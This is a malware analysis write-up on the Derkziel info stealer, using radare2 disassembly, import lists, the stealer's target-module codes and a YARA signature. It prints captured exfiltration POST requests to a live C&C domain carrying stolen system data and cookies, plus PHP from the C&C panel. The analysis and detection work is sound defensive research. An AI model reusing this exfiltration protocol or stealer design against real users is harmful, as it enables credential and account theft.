Derkziel Software
Intro
What do we know about Derkziel? …not much yet, but the little we know looks like a joke. Derkziel Software was a totally unknown adversary to us, actually the first time we noticed it was sifting through [CyberCrime Tracker].
So why did we decide to analyze Derkziel?, hmm well to be totally honest, we had nothing better to do at 03:00 am.
We know, it doesn’t sound like a typical sexy malware tale… but anyway!
Sample Analysis
For static analysis we used [Radare2]. Now, we don’t want to make a whole post about radare2, it’s just that we use this framework because we are phun! people. There is plenty of documentationin their website as well as slide decks for[talks and workshops].
To get into matters, first we run rahash2. This is part of Radare2, with this tool we will hash one of our files.
$ rahash2 -a md5 derk/user0000036-601704015.tmp
derk/user0000036-601704015.tmp: 0x00000000-0x0007c1ff md5: 7525ef63c8e9346a3e897c8d91231a73
For the next step we use rabin2. This tool allows you to get all sort of useful information about ELF/PE/MZ and CLASS files in a simple way, we pipe to grep to filter the class. Easy. PE. We love PE files!
| **$ rabin2 -I derk/user0000036-601704015.tmp | grep class** |
class PE32
Okay, so we want more info about the binary: again rabin2.
$ rabin2 -k '*' derk/user0000036-601704015.tmp
archs=0:0:x86:32
pe.canary=false
pe.highva=false
pe.aslr=false
pe.forceintegrity=false
pe.nx=false
pe.isolation=true
pe.seh=true
pe.bind=true
pe.appcontainer=false
pe.wdmdriver=false
pe.guardcf=false
pe.terminalserveraware=false
pe.bits=0x20
For extracting sections we use -S. Here we go!
$ rabin2 -S derk/user0000036-601704015.tmp
Sections
idx=00 vaddr=0x00401000 paddr=0x00000400 sz=403968 vsz=403628 perm=m-r-x name=.text
idx=01 vaddr=0x00464000 paddr=0x00062e00 sz=512 vsz=280 perm=m-r-x name=.itext
idx=02 vaddr=0x00465000 paddr=0x00063000 sz=38400 vsz=38004 perm=m-rw- name=.data
idx=03 vaddr=0x0046f000 paddr=0x0006c600 sz=0 vsz=12532 perm=m-rw- name=.bss
idx=04 vaddr=0x00473000 paddr=0x0006c600 sz=5632 vsz=5382 perm=m-rw- name=.idata
idx=05 vaddr=0x00475000 paddr=0x0006dc00 sz=0 vsz=8 perm=m-rw- name=.tls
idx=06 vaddr=0x00476000 paddr=0x0006dc00 sz=512 vsz=24 perm=m-r-- name=.rdata
idx=07 vaddr=0x00477000 paddr=0x0006de00 sz=13312 vsz=13216 perm=m-r-- name=.reloc
idx=08 vaddr=0x0047b000 paddr=0x00071200 sz=45056 vsz=45044 perm=m-r-- name=.rsrc
Alright, so now we want to compare two samples to see differences in the offsets and other parts between the binaries. It will also help to see some other things!. Radiff2 is your friend.
| **$ radiff2 -x derk/user0000036-601704015.tmp derk/user0000001-868286468.tmp | grep -v ‘ ! ‘ ** |
offset 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
0x0007bc60 ff0000000b6465726b7a69656c2e7375 .....derkziel.su ff000000146675636b696e67796f7572 .....fuckingyour
0x0007bc70 707730000000000000000000000090fa pw0............. 7369737465722e7275000000000090fa sister.ru.......
0x0007bc80 5f030000000000000000c89398000200 _............... 6e030000000000000000509598000200 n.........P.....
0x0007bcf0 000000d17674c8939800000000000000 ....vt.......... 000000d1767450959800000000000000 ....vtP.........
0x0007bd20 0100e0fa5f031c000000e0fa5f031c00 ...._......._... 0100e0fa6e031c000000e0fa6e031c00 ....n.......n...
0x0007bd30 0000496111bc0d000000a0f69800259b ..Ia..........%. 0000496120bc0c00000020f89800259b ..Ia ..... ...%.
0x0007bd70 303030303033362f676174652e706870 0000036/gate.php 303030303030312f676174652e706870 0000001/gate.php
0x0007bda0 5f030000000000000000000000000100 _............... 6e030000000000000000000000000100 n...............
0x0007bdd0 00009003000001000000000000001002 ................ 0000f803000001000000000000001002 ................
0x0007be00 000008fb5f03496111bc50fa5f034113 ...._.Ia..P._.A. 000008fb6e03496120bc50fa6e034113 ....n.Ia .P.n.A.
0x0007be10 7474ccfb5f034113747411073dcbfeff tt.._.A.tt..=... 7474ccfb6e034113747411073dcbfeff tt..n.A.tt..=...
0x0007be20 ffffdcfb5f0326752775000000001cfc ...._.&u'u...... ffffdcfb6e0326752775000000001cfc ....n.&u'u......
0x0007be30 5f03000000000000000000000000c0fb _............... 6e03000000000000000000000000c0fb n...............
0x0007be40 5f0363a641bd7c5161001cfc5f03feff _.c.A.|Qa..._... 6e0363a670bd7c5161001cfc6e03feff n.c.p.|Qa...n...
0x0007be50 ffff368502bfcda90a77282dba00f447 ..6......w(-...G ffff368533bfcda90a77d02fba00d44c ..6.3....w./...L
0x0007be60 980002000b636f6e74726f6c2e657865 .....control.exe 980002000b737663686f73742e657865 .....svchost.exe
0x0007be70 0c770cfc5f0341137474918b3dcbfeff .w.._.A.tt..=... 0c770cfc6e0341137474918b3dcbfeff .w..n.A.tt..=...
0x0007be80 ffff549ab2000100000001000008ccfb ..T............. ffff2c81b2000100000001000008ccfb ..,.............
0x0007be90 5f038c35b100010000006cffb2000100 _..5......l..... 6e032c38b100010000001c01b3000100 n.,8............
0x0007beb0 5f03000000000e0000008e35b1000e00 _..........5.... 6e03000000000e0000002e38b1000e00 n..........8....
0x0007bf30 0000b04ef362990af78490fc5f03aab3 ...N.b......_... 0000b04ef36281894e9190fc6e03aab3 ...N.b..N...n...
0x0007bf90 12000000000060e2b30078fd5f03a406 ......`...x._... 120000000000c0e2b30078fd6e03a406 ..........x.n...
0x0007bff0 40000e5440006100000008b6b000d0fd @..T@.a......... 400024fd6e0359b540000e544000d0fd @.$.n.Y.@..T@...
0x0007c000 5f03166740001c93400018000000e404 _..g@...@....... 6e03166740001c93400022000000e404 n..g@...@.".....
0x0007c010 00000b0000007f954000d0fd5f030b00 ........@..._... 0000140000007f954000d0fd6e031400 ........@...n...
0x0007c020 0000d0fd5f0358fd5f03719d40004357 ...._.X._.q.@.CW 0000d0fd6e0358fd6e03719d4000e404 ....n.X.n.q.@...
0x0007c030 40000200000080fd5f03326740002a94 @......._.2g@.*. 0000d800000080fd6e03326740002a94 ........n.2g@.*.
0x0007c040 4000ad0000000c00000064aa74006caa @.........d.t.l. 4000d80000001500000064aa74006caa @.........d.t.l.
0x0007c060 0000000000005041263d4f38c28237b8 ......PA&=O8..7. 0000000001015041263d4f38c28237b8 ......PA&=O8..7.
Oops, does that look like a URL?!?! So, it looks like the only thing that changes is the URL that the sample connects to and the process name, which are hardcoded inside the binary at offsets 0x0007bc60 and 0x0007be65
[0x00000000]> s 0x07bc65
[0x0007bc60]> x 64
offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
0x0007bc65 6465 726b 7a69 656c 2e73 7570 7730 0000 derkziel.supw0..
0x0007bc75 0000 0000 0000 0000 0090 fa5f 0300 0000 ..........._....
0x0007bc85 0000 0000 00c8 9398 0002 0000 0007 0000 ................
0x0007bc95 0000 0000 0000 0000 0038 0000 0000 0000 .........8......
[0x00000000]> s 0x07be65
[0x0007be65]> x 64
offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
0x0007be65 636f 6e74 726f 6c2e 6578 650c 770c fc5f control.exe.w.._
0x0007be75 0341 1374 7491 8b3d cbfe ffff ff54 9ab2 .A.tt..=.....T..
0x0007be85 0001 0000 0001 0000 08cc fb5f 038c 35b1 ..........._..5.
0x0007be95 0001 0000 006c ffb2 0001 0000 002c 21b6 .....l.......,!.
So it looks like it is. So let’s look for this offset inside the binary.
Now we are going to check more static parts of the main sample, for example, the entrypoints
$ rabin2 -e derk/user0000036-601704015.tmp
[source,c]
[Entrypoints] vaddr=0x004640e4 paddr=0x00062ee4 baddr=0x00400000 laddr=0x00000000
1 entrypoints
Well now we have some basic information let’s go take a look inside of main sample.
$r2 derk/user0000036-601704015.tmp
… now we want to know what libraries they use.
[0x004640e4]> il
Linked libraries
oleaut32.dll
user32.dll
kernel32.dll
gdi32.dll
advapi32.dll
shfolder.dll
shell32.dll
wsock32.dll
comctl32.dll
msvcrt.dll
crypt32.dll
11 libraries
Now we are going to run check the imports the sample uses. iiq to check the imports.
[0x004640e4]> iiq
oleaut32.dll_SysFreeString
oleaut32.dll_SysReAllocStringLen
oleaut32.dll_SysAllocStringLen
user32.dll_MessageBoxA
kernel32.dll_Sleep
kernel32.dll_VirtualFree
kernel32.dll_VirtualAlloc
kernel32.dll_VirtualQuery
kernel32.dll_GetSystemInfo
kernel32.dll_GetVersion
kernel32.dll_SetThreadLocale
kernel32.dll_WideCharToMultiByte
kernel32.dll_MultiByteToWideChar
kernel32.dll_GetACP
kernel32.dll_GetStartupInfoW
kernel32.dll_GetProcAddress
kernel32.dll_GetModuleHandleW
kernel32.dll_GetModuleFileNameW
kernel32.dll_GetCommandLineW
kernel32.dll_FreeLibrary
kernel32.dll_UnhandledExceptionFilter
kernel32.dll_RtlUnwind
kernel32.dll_RaiseException
kernel32.dll_ExitProcess
kernel32.dll_GetCurrentThreadId
kernel32.dll_CreateThread
kernel32.dll_DeleteCriticalSection
kernel32.dll_InitializeCriticalSection
kernel32.dll_WriteFile
kernel32.dll_GetStdHandle
kernel32.dll_CloseHandle
kernel32.dll_GetProcAddress
kernel32.dll_RaiseException
kernel32.dll_LoadLibraryA
kernel32.dll_GetLastError
kernel32.dll_TlsSetValue
kernel32.dll_TlsGetValue
kernel32.dll_LocalFree
kernel32.dll_LocalAlloc
kernel32.dll_GetModuleHandleW
kernel32.dll_FreeLibrary
user32.dll_CreateWindowExW
user32.dll_UnregisterClassW
user32.dll_TranslateMessage
user32.dll_ToUnicodeEx
user32.dll_SystemParametersInfoW
user32.dll_ShowWindow
user32.dll_SetWindowPos
user32.dll_SendMessageW
user32.dll_RegisterClassW
user32.dll_OpenClipboard
user32.dll_MapVirtualKeyExW
user32.dll_LoadCursorW
user32.dll_LoadBitmapW
user32.dll_IsWindow
user32.dll_GetWindowThreadProcessId
user32.dll_GetWindowTextW
user32.dll_GetWindowRect
user32.dll_GetSystemMetrics
user32.dll_GetMessageW
user32.dll_GetKeyboardState
user32.dll_GetKeyboardLayout
user32.dll_GetKeyState
user32.dll_GetKeyNameTextA
user32.dll_GetForegroundWindow
user32.dll_GetClipboardData
user32.dll_GetClassNameW
user32.dll_GetAsyncKeyState
user32.dll_FindWindowA
user32.dll_EnumDisplayDevicesW
user32.dll_DispatchMessageW
user32.dll_DefWindowProcW
user32.dll_CloseClipboard
gdi32.dll_DeleteObject
gdi32.dll_CreateFontW
kernel32.dll_lstrlenA
kernel32.dll_WriteFile
kernel32.dll_WideCharToMultiByte
kernel32.dll_WaitForSingleObject
kernel32.dll_VerLanguageNameA
kernel32.dll_UnmapViewOfFile
kernel32.dll_UnlockFileEx
kernel32.dll_UnlockFile
kernel32.dll_TerminateProcess
kernel32.dll_SystemTimeToFileTime
kernel32.dll_Sleep
kernel32.dll_SetFilePointer
kernel32.dll_SetEndOfFile
kernel32.dll_ReadFile
kernel32.dll_QueryPerformanceCounter
kernel32.dll_OutputDebugStringA
kernel32.dll_OutputDebugStringW
kernel32.dll_OpenProcess
kernel32.dll_MultiByteToWideChar
kernel32.dll_MapViewOfFile
kernel32.dll_LockResource
kernel32.dll_LockFileEx
kernel32.dll_LockFile
kernel32.dll_LocalFree
kernel32.dll_LoadResource
kernel32.dll_LoadLibraryA
kernel32.dll_LoadLibraryW
kernel32.dll_LeaveCriticalSection
kernel32.dll_InitializeCriticalSection
kernel32.dll_HeapValidate
kernel32.dll_HeapSize
kernel32.dll_HeapReAlloc
kernel32.dll_HeapFree
kernel32.dll_HeapDestroy
kernel32.dll_HeapCreate
kernel32.dll_HeapAlloc
kernel32.dll_GlobalUnlock
kernel32.dll_GlobalSize
kernel32.dll_GlobalLock
kernel32.dll_GetVolumeInformationW
kernel32.dll_GetVersionExA
kernel32.dll_GetVersionExW
kernel32.dll_GetTickCount
kernel32.dll_GetTempPathA
kernel32.dll_GetTempPathW
kernel32.dll_GetSystemTimeAsFileTime
kernel32.dll_GetSystemTime
kernel32.dll_GetSystemInfo
kernel32.dll_GetSystemDefaultLangID
kernel32.dll_GetProcessHeap
kernel32.dll_GetProcAddress
kernel32.dll_GetModuleHandleW
kernel32.dll_GetLastError
kernel32.dll_GetFullPathNameA
kernel32.dll_GetFullPathNameW
kernel32.dll_GetFileSize
kernel32.dll_GetFileAttributesExW
kernel32.dll_GetFileAttributesA
kernel32.dll_GetFileAttributesW
kernel32.dll_GetDiskFreeSpaceA
kernel32.dll_GetDiskFreeSpaceW
kernel32.dll_GetCurrentProcessId
kernel32.dll_GetCurrentProcess
kernel32.dll_GetComputerNameW
kernel32.dll_InterlockedCompareExchange
kernel32.dll_FreeLibrary
kernel32.dll_FormatMessageA
kernel32.dll_FormatMessageW
kernel32.dll_FlushFileBuffers
kernel32.dll_FindResourceW
kernel32.dll_FindNextFileA
kernel32.dll_FindNextFileW
kernel32.dll_FindFirstFileA
kernel32.dll_FindFirstFileW
kernel32.dll_FindClose
kernel32.dll_ExitProcess
kernel32.dll_EnterCriticalSection
kernel32.dll_DeleteFileA
kernel32.dll_DeleteFileW
kernel32.dll_DeleteCriticalSection
kernel32.dll_CreateMutexW
kernel32.dll_CreateFileMappingA
kernel32.dll_CreateFileMappingW
kernel32.dll_CreateFileA
kernel32.dll_CreateFileW
kernel32.dll_CopyFileA
kernel32.dll_CloseHandle
kernel32.dll_AreFileApisANSI
advapi32.dll_RegSetValueExW
advapi32.dll_RegQueryValueExW
advapi32.dll_RegOpenKeyExW
advapi32.dll_RegOpenKeyW
advapi32.dll_RegCreateKeyExW
advapi32.dll_RegCloseKey
advapi32.dll_OpenProcessToken
advapi32.dll_GetUserNameW
SHFolder.dll_SHGetFolderPathW
shell32.dll_ShellExecuteW
wsock32.dll_WSACleanup
wsock32.dll_WSAStartup
wsock32.dll_gethostbyname
wsock32.dll_socket
wsock32.dll_send
wsock32.dll_recv
wsock32.dll_inet_ntoa
wsock32.dll_inet_addr
wsock32.dll_htons
wsock32.dll_connect
wsock32.dll_closesocket
comctl32.dll_InitCommonControls
msvcrt.dll__ftol
msvcrt.dll_memcpy
msvcrt.dll_memcmp
msvcrt.dll_memmove
msvcrt.dll_memset
msvcrt.dll_localtime
crypt32.dll_CryptUnprotectData
The entry looks like this:
[0x004641e4]> pdf
╒ (fcn) entry0 284
│ 0x004640e4 55 push ebp
│ 0x004640e5 8bec mov ebp, esp
│ 0x004640e7 83c4f0 add esp, -0x10
│ 0x004640ea b8441d4600 mov eax, 0x461d44
│ 0x004640ef e81410faff call fcn.00405108
│ 0x004640f4 b8e3040000 mov eax, 0x4e3
│ 0x004640f9 e8660efaff call fcn.00404f64
│ 0x004640fe e85133faff call fcn.send_system_data ; Extract config and get system info
│ 0x00464103 e834dbffff call fcn.main_stealer ; Main stealer. Sends info to CnC
│ 0x00464108 e89b30faff call fcn.check_presence ; Check if sample is running and present on autorun
│ 0x0046410d e86255faff call fcn.keylogger ; Install keylogger, steal Steam data
│ 0x00464112 e895f7f9ff call fcn.004038ac
│ 0x00464117 90 nop
If we analyze the call at 0x004640fe (fcn.main_stealer), we find this nested call:
0x00461c59 e842ffffff call fcn.00461ba0
That function is responsible of executing the payload that gets information from the system, logins, cookies and steam information:
[0x00461ba0]> pdf @ 0x00461ba0
;-- fcn.steal_and_send:
╒ (fcn) fcn.00461ba0 126
│ ; var int local_1 @ ebp-0x4
│ ; var int local_2 @ ebp-0x8
│ ; var int local_3 @ ebp-0xc
│ ; var int local_4 @ ebp-0x10
│ ; var int local_5 @ ebp-0x14
│ ; CALL XREF from 0x00461c59 (fcn.00461ba0)
│ 0x00461ba0 55 push ebp
│ 0x00461ba1 8bec mov ebp, esp
│ 0x00461ba3 33c9 xor ecx, ecx
│ 0x00461ba5 51 push ecx
│ 0x00461ba6 51 push ecx
│ 0x00461ba7 51 push ecx
│ 0x00461ba8 51 push ecx
│ 0x00461ba9 51 push ecx
│ 0x00461baa 53 push ebx
│ 0x00461bab 8bd8 mov ebx, eax
│ 0x00461bad 33c0 xor eax, eax
│ 0x00461baf 55 push ebp
│ 0x00461bb0 681e1c4600 push 0x461c1e
│ 0x00461bb5 64ff30 push dword fs:[eax]
│ 0x00461bb8 648920 mov dword fs:[eax], esp
│ 0x00461bbb 68381c4600 push 0x461c38
│ 0x00461bc0 8d45fc lea eax, [ebp-local_1]
│ 0x00461bc3 e8e851faff call fcn.get_environment_info
│ 0x00461bc8 ff75fc push dword [ebp-local_1]
│ 0x00461bcb 8d45f8 lea eax, [ebp-local_2]
│ 0x00461bce e801b8faff call fcn.get_browser_logins
│ 0x00461bd3 ff75f8 push dword [ebp-local_2]
│ 0x00461bd6 8d45f4 lea eax, [ebp-local_3]
│ 0x00461bd9 e8d66cfaff call fcn.get_steam_data
│ 0x00461bde ff75f4 push dword [ebp-local_3]
│ 0x00461be1 8d45f0 lea eax, [ebp-local_4]
│ 0x00461be4 e84f84faff call fcn.get_video_info
│ 0x00461be9 ff75f0 push dword [ebp-local_4]
│ 0x00461bec 8d45ec lea eax, [ebp-local_5]
│ 0x00461bef e808b9faff call fcn.get_browser_cookies
│ 0x00461bf4 ff75ec push dword [ebp-local_5]
│ 0x00461bf7 8bc3 mov eax, ebx
│ 0x00461bf9 ba06000000 mov edx, 6
│ 0x00461bfe e82926faff call fcn.0040422c
│ 0x00461c03 33c0 xor eax, eax
│ 0x00461c05 5a pop edx
│ 0x00461c06 59 pop ecx
│ 0x00461c07 59 pop ecx
│ 0x00461c08 648910 mov dword fs:[eax], edx
│ 0x00461c0b 68251c4600 push 0x461c25
│ ; JMP XREF from 0x00461c23 (fcn.00461ba0)
│ 0x00461c10 8d45ec lea eax, [ebp-local_5]
│ 0x00461c13 ba05000000 mov edx, 5
│ 0x00461c18 e8cf1ffaff call fcn.00403bec
╘ 0x00461c1d c3 ret
When this function returns, the sample sends the info to the C&C.
Communication Analysis
Until now, we have detected two versions of Derkziel (1.0 and 1.1). The payloads belong to version 1.1.
The first communication from the sample sends information about the system in which it is running:
hxxp://fuckingyoursister[.]ru/admin/user0000002/gate.php
POST /admin/user0000002/gate.php HTTP/1.1
Host: fuckingyoursister.ru
User-Agent: Uploador
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------282861610524488
Connection: close
Content-Length: 660
-----------------------------282861610524488
Content-Disposition: form-data; name="data"; filename="derkziel.txt"
Content-Type: application/octet-stream
{#!DRZ!}0000000{!DRZ!#}MLWRE-VM{!}DRZ{!}Sarah Connor{!}DRZ{!}Windows 7 Ultimate{!}DRZ{!}64{!}DRZ{!}1{!}DRZ{!}-1851432336{!}DRZ{!}{#!DRZ!}0000022{!DRZ!#}TGFuZ3VhZ2U6IEVuZ2xpc2ggKFVuaXRlZCBTdGF0ZXMpDQpSZXNvbHV0aW9uOiAxMDI0eDc2OA0KVXB0aW1lOiAwIERheXMgMCBIb3VyIDcgTWludXRlcyAxMiBTZWNvbmRzDQpWaWRlbyBDYXJkOiBTdGFuZGFyZCBWR0EgR3JhcGhpY3MgQWRhcHRlcg0KUkRQREQgQ2hhaW5lZCBERA0KUkRQIEVuY29kZXIgTWlycm9yIERyaXZlcg0KUkRQIFJlZmxlY3RvciBEaXNwbGF5IERyaXZlcg0K
-----------------------------282861610524488--
Fields are surrounded by {#!DRZ!} and {#!DRZ!#} except the last one which contains information about the system. The first parameter (0000000) is parsed by gate.php and mapped to different functions. These constants can be found inside the sample and gives a hint as to the different types of information that the sample steals.
0000000 System Info
00000001 Google Chrome
00000002 Yandex Browser
00000003 Nichrome
00000004 Comodo Dragon
00000005 RockMelt
00000006 Epic
00000007 Opera
00000008 Chromium
00000009 CoolNovo
0000010 Baidu
0000011 Sleipnir
0000012 Orbitum
0000013 Uran
0000014 Qip Surf
0000015 Amigo
0000016 Mozilla Firefox
0000017 Steam
0000018 Browser Cookies
0000019 Steam Logger
0000020 Skype Logger
0000021 Steam SSFN
0000022 Full System Information
0000023 Bitcoin recursive
0000024 Titan
0000025 Coowon
[0x100001058]> ?b64- TGFuZ3VhZ2U6IEVuZ2xpc2ggKFVuaXRlZCBTdGF0ZXMpDQpSZXNvbHV0aW9uOiAxMDI0eDc2OA0KVXB0aW1lOiAwIERheXMgMCBIb3VyIDcgTWludXRlcyAxMiBTZWNvbmRzDQpWaWRlbyBDYXJkOiBTdGFuZGFyZCBWR0EgR3JhcGhpY3MgQWRhcHRlcg0KUkRQREQgQ2hhaW5lZCBERA0KUkRQIEVuY29kZXIgTWlycm9yIERyaXZlcg0KUkRQIFJlZmxlY3RvciBEaXNwbGF5IERyaXZlcg0K
Language: English (United States)
Resolution: 1024x768
Uptime: 0 Days 0 Hour 7 Minutes 12 Seconds
Video Card: Standard VGA Graphics Adapter
RDPDD Chained DD
RDP Encoder Mirror Driver
RDP Reflector Display Driver
Derkziel Version 1.0 used base64 for encoding the payload. This version use base64 too but just for sending some information. On version 1.0 it was encoded inside the encoded payload.
After this, Derkziel sends the cookies obtained from different browsers. In this case, this was stolen from Chrome:
enter code herePOST /admin/user0000002/gate.php HTTP/1.1 Host: fuckingyoursister.ru User-Agent: Uploador Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Content-Type: multipart/form-data; boundary=—————————282861610524488 Connection: close Content-Length: 2133
-----------------------------282861610524488
Content-Disposition: form-data; name="data"; filename="derkziel.txt"
Content-Type: application/octet-stream
{#!DRZ!}0000000{!DRZ!#}MLWRE-VM{!}DRZ{!}Sarah Connor{!}DRZ{!}Windows 7 Ultimate{!}DRZ{!}64{!}DRZ{!}1{!}DRZ{!}-1617007100{!}DRZ{!}{#!DRZ!}0000022{!DRZ!#}TGFuZ3VhZ2U6IEVuZ2xpc2ggKFVuaXRlZCBTdGF0ZXMpDQpSZXNvbHV0aW9uOiAxNDQweDgzMA0KVXB0aW1lOiAwIERheXMgNCBIb3VyIDM4IE1pbnV0ZXMgNTkgU2Vjb25kcw0KVmlkZW8gQ2FyZDogVmlydHVhbEJveCBHcmFwaGljcyBBZGFwdGVyDQpSRFBERCBDaGFpbmVkIEREDQpSRFAgRW5jb2RlciBNaXJyb3IgRHJpdmVyDQpSRFAgUmVmbGVjdG9yIERpc3BsYXkgRHJpdmVyDQo={#!DRZ!}0000018{!DRZ!#}<filedata> {
"domain": ".youtube.com",
"hostOnly": false,
"name": "PREF",
"path": "/",
"session": false,
"value": "f1=50000000"
},
{
"domain": ".youtube.com",
"hostOnly": false,
"name": "VISITOR_INFO1_LIVE",
"path": "/",
"session": false,
"value": "LlKscMaIefE"
},
<!filedata>
-----------------------------282861610524488--
During the analysis, we found that the gate has a parser to get information about bitcoin wallets, although that functionality seems missing in the analyzed samples.
function module_rec_bitcoins($report_id, $report_unique_id, $import_time, $module_name, $source_data)
{
while (strpos($source_data, "<-----!FILE!----->") == true)
{
$wallet_module = ParsXML($source_data,'#bcname#=','#!bcname!#');
$wallet_address = ParsXML($source_data,'#waddress#=','#!waddress!#');
$filename = ParsXML($source_data,'#filename#=','#!filename!#');
$filedata = ParsXML($source_data,'#filedata#=', '#!filedata!#');
$source_data =substr_replace($source_data, "", strpos($source_data, "<-----!FILE!----->"), strlen("<-----!FILE!----->"));
$source_data =substr_replace($source_data, "", strpos($source_data, "#filename#="), strlen("#filename#="));
$source_data =substr_replace($source_data, "", strpos($source_data, "#filedata#="), strlen("#filedata#="));
$source_data =substr_replace($source_data, "", strpos($source_data, "#bcname#="), strlen("#bcname#="));
$source_data =substr_replace($source_data, "", strpos($source_data, "#waddress#="), strlen("#waddress#="));
AddFileToWallet($report_id, $report_unique_id, $import_time, $wallet_module, $wallet_address, $filename, $filedata);
$filename = "";
$filedata = "";
}
}
C&C
Derkziel command and control, looks like tipical C&C Dashboard, this part is just to show you the look and feel inside the C&C. 
It’s interesting to note that each time you want to login to the C&C, the background image changes for new one. They have lot of cool backgrounds! Anyway let’s check inside….
The main view shows you all the bots infected and reporting to the C&C. This is just a quick overview of the number of computers infected.
It also has a detailed view with all infected computers that allows to add comments for each infected system
As you can see the botmaster added comments into each infected computer. In most of cases he adds Steam Games balances or cash.
Inside each infected computer report we can see a detailed report with all features of the malware.
Basically the main target for Derkziel Malware are Steam accounts. You can see they have Steam keyloger and Steam Profile Downloader, althogh also they have a nice formgrabber for Internet Browsers.
We add just other capture with more user interaction:
And finally we want to show you the configuration side of the C&C:
The settings page allows you to change language. Available languages are English, Russian and Ukranian. And you can even upload your custom background!
The C&C has a internal builder to setup your own Malware file acording to your hosting settings.
Yara Signature
Finally with the main strings we create our own Yara signature:
Yara Signature
rule Derkziel
{
meta:
description = "Derkziel info stealer (Steam, Opera, Yandex, ...)"
author = "The Malware Hunter"
yaraexchange = "No distribution without author's consent"
filetype = "pe"
date = "2015-11"
md5 = "f5956953b7a4acab2e6fa478c0015972"
site = "https://zoo.mlw.re/samples/f5956953b7a4acab2e6fa478c0015972"
reference = "https://bhf.su/threads/137898/"
strings:
$drz = "{!}DRZ{!}"
$ua = "User-Agent: Uploador"
$steam = "SteamAppData.vdf"
$login = "loginusers.vdf"
$config = "config.vdf"
condition:
all of them}
enter code here
Testing our rule, of course, with Radare2 :]
[source,c] [0x004640e4]> yara3 add /tmp/derkziel.yar [0x004640e4]> yara3 list Derkziel [0x004640e4]> yara3 scan Derkziel [0x004640e4]>
Who’s Your Daddy???
Conclusions
As we saw, this threat is not a really challenging one. The samples analysed don’t use any kind of anti-{debugging,reversing,av} techniques and the number of features are low compared with other current threats. During the time we have been analyzing Derkziel we have detected a number of DNS changes, although the samples don’t use dynamic C&C resolution. This makes the sample unusable once the domain is down.
About the actor behind, we will leave it up to you to find this guy…
Happy Ending
**Samples analized **
6aa6dbb3d2a1a195bd621237bb65812d
a7ad5cea87287ce8e47d8ef08273e0f6
bd72ff73db2b52e303881cf6326d62e6
aa3d96db36b5680cf5107ac09c003067
2785dad301a4f1524e76af812a63bf99
7525ef63c8e9346a3e897c8d91231a73
PCAP for phun